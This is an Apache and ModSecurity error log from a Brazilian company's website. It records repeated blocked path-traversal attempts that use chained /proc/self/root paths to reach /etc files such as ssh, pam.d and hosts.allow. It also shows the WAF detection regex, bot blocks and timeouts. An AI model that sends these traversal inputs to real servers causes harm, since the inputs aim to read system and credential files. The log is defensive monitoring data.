[Thu Mar 19 05:43:46.138969 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:48546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3Qta6ubjKNq_cu4YbLQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:43:49.294106 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:48552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3Rfu8EFLIOrSqIpt2sgAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:43:50.971513 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:34092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3RhkFeYa1D6dYQnDGfAAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:44:01.133786 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:44:06.191408 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.243.128:34108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3Vl_V7PWP6ixUYl6TFQAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:44:12.158203 2026] [mime_magic:error] [pid 30077:tid 140411733534464] (70014)End of file found: [client 57.141.18.21:49438] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:44:23.109893 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:44:30.773633 2026] [mime_magic:error] [pid 17653:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:30259] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:44:30.773805 2026] [access_compat:error] [pid 17653:tid 140411666392832] [client 216.73.216.191:30259] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Thu Mar 19 05:44:44.033903 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48046] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:44:54.970710 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:38336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3hvu8EFLIOrSqIpt2-wAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:44:57.295779 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:49886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3iQbLMZ6AikZjR9U0mgAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:45:06.133784 2026] [proxy_fcgi:error] [pid 27403:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:45:19.534969 2026] [:error] [pid 19093:tid 140411741927168] [client 216.73.216.191:56000] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3n1_V7PWP6ixUYl6TMgAAAoA"]
[Thu Mar 19 05:45:19.687580 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.228.61:45872] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu3nxkFeYa1D6dYQnDGoQAAAcA"]
[Thu Mar 19 05:45:24.004884 2026] [core:alert] [pid 27293:tid 140411725141760] [client 74.7.241.31:35004] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/kbd/keymaps/legacy/mac
[Thu Mar 19 05:45:26.343703 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:49886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3pgbLMZ6AikZjR9U0xgAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:45:29.297512 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.243.128:56878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3qRkFeYa1D6dYQnDGowAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:45:34.120425 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:46:06.089812 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:46:20.705883 2026] [:error] [pid 30077:tid 140411632822016] [client 216.73.216.191:8107] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu33Pu8EFLIOrSqIpt3JwAAAk0"]
[Thu Mar 19 05:46:44.121887 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50502] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:47:23.130062 2026] [proxy_fcgi:error] [pid 19093:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51368] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:47:33.611495 2026] [core:alert] [pid 31803:tid 140411649607424] [client 57.141.18.106:53386] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:47:39.235441 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.244.43:44724] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu4K_u8EFLIOrSqIpt3UgAAAkA"]
[Thu Mar 19 05:47:56.122987 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:48:21.107877 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:48:43.131329 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:49:04.137827 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:49:25.137811 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:49:47.117825 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:50:09.133896 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55718] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:50:21.174382 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.228.61:52300] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu4zf-YZRR_7pZ7nDJlsAAAA8k"]
[Thu Mar 19 05:50:31.133796 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56290] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:50:39.729366 2026] [mime_magic:error] [pid 27293:tid 140411632822016] (70014)End of file found: [client 57.141.18.70:58476] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:50:47.667037 2026] [core:alert] [pid 26799:tid 140411674785536] [client 57.141.18.65:58614] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:50:53.033857 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56834] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:51:08.003250 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:38960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu4_P-YZRR_7pZ7nDJl1wAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:51:09.831916 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:51174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu4_fu8EFLIOrSqIpt30QAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:51:12.324689 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:51184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5AAkwaGbbGflqUZCPgQAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:51:16.127048 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57394] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:51:17.666982 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:51198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5Bda6ubjKNq_cu4YcnAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:51:37.595853 2026] [:error] [pid 30077:tid 140411548894976] [client 216.73.216.191:1260] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5Gfu8EFLIOrSqIpt32gAAAlc"]
[Thu Mar 19 05:51:39.121833 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57902] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:51:45.319861 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:40270] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/spool/postfix
[Thu Mar 19 05:51:45.320285 2026] [access_compat:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:40270] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/spool/postfix
[Thu Mar 19 05:52:09.122266 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58548] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:52:42.135519 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59260] AH01075: Error dispatching request to : (polling)
